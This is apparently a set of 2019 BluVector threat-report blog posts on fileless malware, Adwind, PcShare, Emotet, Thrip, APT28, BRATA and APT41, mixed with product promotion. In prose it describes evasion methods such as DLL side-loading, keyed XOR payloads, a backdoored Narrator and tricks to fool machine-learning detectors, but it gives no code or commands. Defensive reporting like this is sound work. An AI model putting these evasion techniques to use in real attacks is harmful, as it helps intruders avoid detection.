Fileless Malware: If You’re Not Worried, You Should Be

Gartner, Inc. estimates that more than $124 billion will be spent on information security products and services in 2019. Conversely, it is estimated that cybercrime will cost the world in excess of $6 trillion annually by 2021, up from $3 trillion in 2015. While the message that “crime does not pay” was drilled into our heads in TV and movies… it seems that it this crime does.

The first computer “virus” can be traced back to 1971. Named “Creeper system,” it would infect the computer with the message “I'm the creeper, catch me if you can!” and would disable that workstation.

Over the years, the bad guys continue to hone their tools and the computer virus has paved the way for computer worms, ransomware, spyware, adware, trojan horses, keyloggers, rootkits and other malicious software. While each of have their own unique traits, they intent is the same -- infecting a computer to do something “evil” on behalf of a threat actor.

As the cat-and-mouse game between security professionals and threat actors play out on a daily basis, a new threat is emerging that is keeping the good guys up at night. The threat of fileless malware is increasing and brings up a unique set of challenges that still thinks about how to combat file-based attacks.

Fileless malware describes a set of attacks that use the underlying operating system, usually Microsoft Windows, against itself. A typical end user barely scratches the surface of the capabilities built into the operating system. Under the hood of Windows are over 100 legitimate Windows system tools including PowerShell, Windows Management Instrumentation (WMI), .NET and Microsoft Office Macros that can be exploited in a fileless malware attack.

These tools do serve a purpose in the typical enterprise. PowerShell is used by system administrators to automate tasks; WMI is used to manage Windows workstations on a network; .NET is used for custom application development and Microsoft Office Macros can be used work magic in Microsoft Word, Excel or PowerPoint.

So, how can you protect against these types of attacks? Turning everything off isn’t possible. A typical enterprise would quickly grind to a halt (and it would be virtually technically impossible to do).

The first thing to keep in mind is that the most common attack vector for fileless malware attacks is delivery as an attachment to an email. Microsoft Office documents or PDF files are often used to deliver a payload with malicious intent. The payload will attempt to use one or more legitimate Windows tools to execute a script or macro and exploit that workstation. As they utilize legitimate Windows functions, they are hard to detect. So threat actors can hide in the shadows of what looks to be normal activity.

Existing, signature-based security can help with known threats, yet they’re challenged to protect against fileless malware attacks. The payload seems to be legitimate and will not raise any red flags. The key to protecting against fileless malware is to look beyond the payload’s contains, and instead understand what that payload is capable of.

While great efforts have been made to educate end users to recognize when an email doesn’t look right and enabling them with a mechanism to report it to the security team, it is only part of the solution. It only takes one user to open an attachment that they should not have to cause a problem.

This is where machine learning (ML) and artificial intelligence (AI) can play a large part in the defense of a network. ML and AI can analyze files and network traffic at line speeds and determine if that content has the potential to do something malicious. A Microsoft Excel spreadsheet with a macro that calculates commissions for a sales team is likely legitimate, but a spreadsheet that executes a Microsoft PowerShell command to download a piece of code is probably not.

A well-trained workforce is a key part of network defense, but it doesn’t scale. An effective defense needs to analyze traffic as it comes across the network and stop it before it makes it into users’ inboxes.

The good news is that the Speculative Code Execution in BluVector Cortex was created to help with the detection of fileless malware within an organization’s network environment. If you’re already a customer, you already have this capability.

Adwind RAT Targets U.S. Petroleum Industry

What Is It?

A new campaign utilizing the Adwind RAT (Remote Access Trojan) and specifically targeting organizations within the U.S. petroleum industry has been discovered by researchers at Netskope. The Adwind RAT is also known as AlienSpy, Frutas, jRAT, JSocket and Sockrat and is written in Java, allowing it to execute on Windows, Linux and Mac systems.

Adwind is available for sale by its authors on the dark web via a malware-as-a-service (MaaS) offering, where attackers pay a fee in order to use the malware in their malicious campaigns. Adwind has been available for a number of years and reports state there were approximately 1,800 unique customers at the end of 2015.

Adwind contains functionality expected of a RAT, including the ability to log keystrokes, steal credentials stored on the system or entered on web pages, take screenshots or audio and video, manipulate files, steal cryptocurrency keys and VPN certificates and download and execute other malware. Netskope found that the attackers behind this campaign were using Adwind as a reconnaissance and exfiltration tool to acquire credentials, documents and other files, such as SSH keys to allow the attackers to move laterally through the network.

The Adwind malware itself isn’t particularly sophisticated at a code level and Netskope believes the variants in this campaign weren’t using the latest versions. However, what makes this campaign noteworthy is the use of multi-level obfuscation and encryption as an attempt to evade detection by legacy security products, including anti-virus. The initial malicious Java JAR file infects systems at targeted organizations as an attachment or a link in a malicious spam email. This JAR file copies itself to the user’s directory and runs the copy, which then decrypts and executes the next stage, which in turn then creates the final JAR payload.

Netskope found the author’s time and effort was well spent creating the multi-level obfuscation and encryption. When the samples were initially scanned by the VirusTotal service, the initial sample was only detected by five products, whereas the final, unobfuscated sample was detected by 49. Clearly their techniques were successful at evading detection by legacy anti-virus products.

After the fact, these products can now create signatures to detect this specific initial sample, however, BluVector Cortex was capable of detecting both these samples months prior to them even being created.

How Does It Propagate?

The Adwind malware does not contain the necessary code to self-propagate. Malicious spam emails containing a link or attachment are used to compromise systems at targeted organizations.

When/How Did BluVector Detect It?

Both the initial and final malicious JAR samples were detected by BluVector’s patented Machine Learning Engine (MLE). Regression testing has shown these samples would have been detected for an average of 30 months prior to their release.


PcShare Malware Brings a Fake Narrator

What Is It?

Researchers from Cylance’s research and intelligence team have detailed an ongoing campaign called PcShare by a suspected Chinese APT (Advanced Persistent Threat) group targeting heavy industrial organizations in South East Asia, including the Philippines and Taiwan. The attack, comprised of two components, starts with is a customized variant of a Chinese open source remote access trojan (RAT), PcShare, which is then followed by a trojanized screen reader which replaces the Narrator utility, part of Microsoft Accessibility Features supplied with Microsoft Windows 10.

The source code for several versions of PcShare is available on GitHub, however the version used by these attackers is heavily modified and employs techniques intended to make detection, especially by legacy anti-virus products, more difficult. Firstly, the code for any functionality not required by the attackers has been removed, which not only makes the code smaller and more efficient, but is likely intended to make signature-based detection less likely. Next, the attack uses a technique known as “DLL side loading” to use a legitimate application to load malicious code into memory and execute it. In this case, a component of the NVIDIA graphics driver is used to achieve this.

The malicious payload is encrypted with the most basic method of a XOR operation using a single byte as the encryption key. However, as an anti-analysis mechanism against manual or automated sandbox analysis, the single byte encryption key is calculated based on the name of its parent process. Once decrypted, the payload is loaded in RAM without ever being saved to disk, again attempting to avoid detection by endpoint security software. These techniques are all relevant in the context that the malware is executing on an endpoint and have no impact on BluVector’s network detection capabilities.

Some of the functionality removed from publicly available PcShare versions relates to audio/video streaming and keylogging. However, the attackers have added the ability to encrypt C2 (command and control) traffic. The have also added code to obtain proxy authentication credentials stored on the infected system. As most corporate networks utilize proxies; this allows the malware to communicate in such an environment. As a RAT, functionality exists to manipulate files, running processes, registry keys and to download and execute other code.

One such piece of code is the so-called fake Narrator malware. The purpose of fake Narrator is to allow the attackers to remotely obtain access to a command prompt, with system level privileges, without authentication. Prior to installing fake Narrator on an infected system, the attackers will rename the legitimate Narrator executable. When fake Narrator has been enabled at the logon screen via Ease Of Access, it runs the legitimate Narrator and creates a hidden, overlapped window. It then monitors keystrokes for a hardcoded password which, if received, allows the attackers to run any application with system privileges on the logon screen. The infected system is now completely compromised and remotely accessible by the attackers.

How Does It Propagate?

The malware discussed here does not self-propagate. The infection vector is not known. However, the most likely vector is social engineering, either as a malicious attachment or downloads performed by malicious documents or links.

When/How Did BluVector Detect It?

Three samples of PcShare are publicly available and BluVector’s patented Machine Learning Engine (MLE) detected them all. Despite the samples being first seen in the wild up to 15 months ago, regression testing has shown the samples would have been detected an average of 47 months prior to their original release.

Emotet Returns After a Summer Break

What Is It?

First discovered in 2014, the Emotet trojan has previously been the subject of several Threat Reports. Initially a banking trojan, it has since evolved to focus on the sending of spam emails and distribution of other malware. This change in functionality might be tied be more profitable option for its authors.

In early June 2019, it was observed that its C2 (command and control) servers had stopped communicating with infected systems. Researchers posited this would be a temporary shutdown and were proven correct, as C2 traffic restarted on August 22nd. After the restart, it appears that the authors performed some housekeeping on their infrastructure, such as removing fake bots attempting to communicate to the C2 servers and preparing the next campaign.

In mid-September the new campaign began, aimed at users in the U.S., the UK, Poland, Italy and Germany. This was a widespread campaign, with spam emails received by home users in addition to corporate and government organizations. Researchers from Cofense Labs found emails from this campaign were sent to users at more than 30,000 domain names and came from 3,362 unique senders at 1,875 domains. The sender’s email credentials had previously been stolen. The spam emails used mainly financially orientated lures, such as overdue bills or payment receipts and were written in the language (English, Polish, Italian and German) matching the domain they were sent to. True to form for Emotet, the attachments to these emails were Microsoft Word documents with malicious macros. Once the Emotet trojan was installed, the Trickbot trojan was downloaded, which frequently results in a tertiary infection of Ryuk ransomware.

The campaign described above has been followed up with another beginning this week. Utilizing another oft-used technique from the attacker’s playbook, the lure of this campaign is that the attachment is a Microsoft Word copy of the highly-publicized and controversial new book by Edward Snowden.

Researchers from Malwarebytes Labs found examples of these spam emails in English, French, Spanish, German and Italian. When the user opens the Microsoft Word document, it uses a similar social engineering technique to the previous campaign to convince users to provide the necessary permissions to allow the malicious macro to execute. In this case, it states Word has not been activated and in order to continue using it, they must enable editing and enable content.

Emotet continues to be an extremely dangerous and prolific threat, in most cases a triple threat of Emotet, Trickbot and Ryuk. The potential end result being the theft of data and credentials followed by encryption of user’s data.

How Does It Propagate?

Emotet uses malicious Microsoft Word documents attached to spam emails as its initial infection vector. However, Emotet also contains a list of frequently used passwords which it uses to attempt to access and infect other systems on the network.

When/How Did BluVector Detect It?

Samples are publicly available from both Emotet campaigns described above and BluVector’s patented Machine Learning Engine (MLE) detected them all. Regression testing has shown samples of both the malicious Microsoft Word documents and the Emotet trojan would have been detected for up to 69 months prior to their release.

Every Employee Is a Cybersecurity Employee

Once, during new hire training, a portion of the training included a representative from each department to introduce their department, its function and to answer any questions from new employees.

In one of these trainings, a salesman talked about his team and then asked the new employees “what department do you work in?” Hands went up with answers of “finance,” “human resources,” “customer support,” “engineering” among others. Once everyone was done, he took a dramatic pause and loudly stated, “No! you all work in sales!” His logic was that every employee of the company worked for sales for each of them helped to represent and “sell” the company to others.

Today, while that still rings true, there is an additional job that everyone in the organization has – being part of the cyber defense for the organization. That shared responsibility is key in making sure that an organization, of any size, is protected against threats.

In 2004, to help promote awareness of the threats, the National Cyber Security Division within the Department of Homeland Security and the nonprofit National Cyber Security Alliance launched National Cyber Security Awareness Month(NCSAM).

October is NCSAM and the theme for 2019 is “Own IT. Secure IT. Protect IT.”, which puts the focus of the shared responsibility on the individual. “Own IT” focuses on the end-user owning their own presence online making them responsible for privacy and application usage. “Secure IT” is about reminding end users to ensure that all transactions are secure and that they are aware of their surroundings online. Finally, “Protect IT” reminds users and enterprises to keep up with the latest security software and patches for browsers, devices and operating systems, as well as to make sure that data that is collected (data at rest) is protected.

Security and IT organizations should focus their efforts around setting up awareness and education programs for both their end users as well as system administrators and security teams. End users should be educated on how to spot, avoid and report phishing emails to avoid exposing the organization to malware. System administrators should be reminded to keep their applications and servers up to date with patches and staying abreast of the latest Common Vulnerabilities and Exposures (CVE) that are relevant for their systems. Users with remote access permissions or using their own devices (BYOT) need to be reminded how to use these safely to access organization resources. Finally, all employees need to understand the exposure created by the use of social media, especially for the risk posed by spearphishing.

Cybersecurity awareness should not be limited to the month of October. The awareness activities and programs shouldn’t be limited to one month. Organizations are under a constant threat coming from all every angle. Keeping an organization secure is full time job and just like the sales guy who stated that everyone is in sales… every employee is part of the cyber defense for an organization.

Thrip APT Group Continues Attacks

What Is It?

Symantec has published the results of research into continuing attacks from an APT (Advanced Persistent Threat) group known as Thrip. It first reported on the activities of this group in June 2018, after Thrip had been targeting satellite communications, telecommunications, geospatial imaging and government/defense organizations, mainly in South East Asia. Attacks by Thrip utilized custom malware in addition to commonly used utilities such as PsExec, Powershell and the open source FTP client, WinSCP.

Since mid-2018, Thrip has continued to target organizations in South East Asia involved in maritime communications, media, education, military and additional satellite communications providers. Target organizations are located in Hong Kong, Indonesia, Macau, Malaysia, the Philippines and Vietnam.

The custom malware utilized in these attacks consists of two backdoors, designated Hannotog and Sagerunex. Additionally, Thrip uses new variants of an information stealer referred to as Catchamas. The Hannotog backdoor provides Thrip with a foothold into a network, Sagerunex offers remote access to systems within the network and Catchamas is selectively installed on systems identified as potentially containing information of value to the attackers.

Thrip also makes use of commonly used utilities, known as “living off the land,” to move laterally through network and perform reconnaissance. From an attacker’s point of view, this is to make use of a target system’s native tools that have numerous legitimate uses, such as Powershell, which is heavily used by Microsoft Windows administrators to perform system management tasks. In this way, less malware needs to be deployed, potentially reducing the likelihood of detection of the compromise, especially by legacy anti-virus solutions.

Symantec found that the Sagerunex appears to be an updated variant of the Evora backdoor malware used by the Billbug APT group. The group has been active for more than 10 years and like Thrip, has a history of executing attacks against organizations in South East Asia. Attribution can be an inexact science, but Symantec believe that Thrip and Billbug may be the same group or separate teams within the same group. Billbug has previously used spearphishing attacks with malicious PDF or Microsoft Office documents as its initial infection vector.

How Does It Propagate?

Though not specifically mentioned, it is likely that the initial infection vector occurs via malicious PDF or Microsoft documents, either as attachments or links within spearphishing emails.

When/How Did BluVector Detect It?

There are 25 samples publicly available and BluVector’s patented Machine Learning Engine (MLE) detected them all. Regression testing has shown the samples would have been detected for an average of 21 months prior to their release.

Microsoft .NET Utilized to Create New Malware Threats on the Fly

An Internet Storm Center diary entry from last week has described recent examples the handler had seen of malware that dynamically compiled the next payload on the infected system. While this is not a new approach to attempting to evade detection, previous instances required that development tools such as compilers were already installed on the system, significantly reducing the potential attack surface. This meant that the user of the infected machine might be a software writer. On one side, this would limit the amount of targets. On the other hand, if a software writer were to compile software that might be shared or sent to others, this would increase the likelihood of additional infections.

In this case, the samples utilize components of the Microsoft .NET runtime environment, which is installed on the vast majority of systems running Microsoft Windows. That means that any system running Windows might be vulnerable to this type of attack.

Both samples create Metasploit Meterpreter reverse shells, giving attackers backdoor access to infected systems. The first sample is a JScript script which decodes included base64 data and passes it to the JScript compiler, resulting in an executable payload. The second sample is a Microsoft Excel spreadsheet containing a malicious macro which also decodes included base64 data. This time the decoded data is passed to the msbuild.exe utility, again resulting in an executable payload.

In both of these cases the attackers are attempting to use dynamic compilation to evade detection for their second stage payloads. However, there is nothing sophisticated or novel in regards to their initial infection vectors, negating their second stage efforts.

When/How Did BluVector Detect It?

BluVector’s patented Machine Learning Engine (MLE) detected the samples. Regression testing has shown the samples would have been detected up to 71 months prior to their release.

APT28 Using Sofacy Backdoor to Evade Machine Learning

The Cylance Threat Research Team released a deep dive report into a piece of malware utilized by the APT28 cyber espionage group, also known as Fancy Bear. The sample was originally uploaded to VirusTotal in May 2019 by US Cyber Command.

The malware, often referred to by legacy AV by the generic name Sofacy, is a backdoor, receives instructions from a C2 (command and control) site and is capable of uploading and downloading files that can create processes and execute a remote shell. It can also contact its C2 site on a predefined schedule, otherwise remaining apparently dormant. C2 communication occurs over port 443 (HTTPS) or port 80 (HTTP). As with many backdoors, it includes the ability to generate C2 host domain names for resiliency purposes.

As this APT malware is used as the initial infection on compromised systems, researchers believe the APT28 group has spent considerable time and effort developing it in an attempt to evade detection by products utilizing machine learning. Examples of this include using standard libraries and compilers, commonly used by benign software. The researchers believe 99% of the code appears to be benign, which may be an attempt to bias the result of detection engines using machine learning towards a benign determination.

When/How Did BluVector Detect It?

Despite the apparent machine learning detection countermeasures, this sample is detected by BluVector’s patented Machine Learning Engine (MLE). Regression testing has shown the sample would have been detected 13 months prior to its original release.


BRATA RAT Targets Brazilian Android Users

Researchers at Kaspersky have described a new remote access trojan (RAT), specifically targeting Android users in Brazil. They have named the malware BRATA, a name created via the contraction of “Brazilian RAT Android.” The first variant was detected in early 2019, with an excess of 20 variants since BRATA was first reported on. The RAT has been distributed by the Google Play Store, in addition to other unaffiliated app stores.

The attackers have used multiple methods to infect users. Most commonly, variants claimed to be updates to the popular WhatsApp messaging application. However other infection vectors have also included messages sent using WhatsApp, SMS messages or links in sponsored Google search results.

The RAT is capable of keylogging and can capture the user’s screen contents and stream it in real time to the attackers. It can also turn off the screen, or alternatively make it appear the screen is turned off, so that it can perform actions without the user’s knowledge. Additionally, as with most RATs, it can launch any installed applications and uninstall itself.

When/How Did BluVector Detect It?

Three samples are publicly available and BluVector’s patented Machine Learning Engine (MLE) detected the trojan in all of those samples. Regression testing has shown that the samples would have been detected 25 months prior to their release. Note: BluVector would only detect the malware if the Android device was connected to a corporate network monitored by BluVector.

APT41 Serves Up State Hacking with a Side of Personal Gain

Researchers from FireEye have released a detailed report into a Chinese state-sponsored cyber espionage group they have named APT41. Over a period of seven years, the APT41 group has conducted cyber espionage activities against organizations in 14 countries, including the United States, the UK, France, Switzerland, South Korea, South Africa, Turkey, India, Italy and Japan. Targeted organizations belong to various industries including healthcare, media, pharmaceuticals, telecoms, travel, education and retail. Some of those compromises were timed in order to obtain intelligence related to corporate events, such as mergers.

What differentiates APT41 from other state-sponsored groups is that it has also targeted organizations related to the video game industry, in what appears to be financially motivated attacks, for personal rather than state gain. These attacks have occurred since 2014 and have occurred concurrently with the cyber espionage attacks. However, APT41 has used tactics, techniques and procedures developed as part of its video game industry attacks to improve the success rate of its cyber espionage attacks.

The APT41 group often utilizes stolen digital certificates to allows it to sign malware, making it much more likely to appear to be benign. Legitimately signed malware is also a key component of one of APT41’s preferred attack vectors, targeted supply chain compromises. In June 2018, a supply chain compromise identified specific targets to receive malicious payloads based upon MAC address or hard drive serial numbers.

Researchers found APT41 utilizes over 46 different types of malware in its campaigns, including rootkits and master boot record bootkits (when particularly stealthy methods are required for specific targets). The APT41 group has remained persistent and able to adjust to reacquire a foothold into organizations within hours or days of actions taken by security teams to remove its malware. As an example, in a year-long campaign, APT41 utilized almost 150 unique pieces of malware, including backdoors, keyloggers, rootkits and information stealers, resulting in the compromise of hundreds of systems.

The malware deployed by APT41 can use genuine websites for command and control (C2) traffic, sites such as Microsoft Technet, Pastebin and Github.

How Does It Propagate?

APT41 uses spear phishing and supply chain compromises as common initial infection vectors. They are not known to use self-propagating malware, which would be considered too noisy for their purposes.

When/How Did BluVector Detect It?

All of the 14 publicly available samples were detected by BluVector’s patented Machine Learning Engine (MLE). Regression testing has shown the samples would have been detected an average of 20 months prior to their release.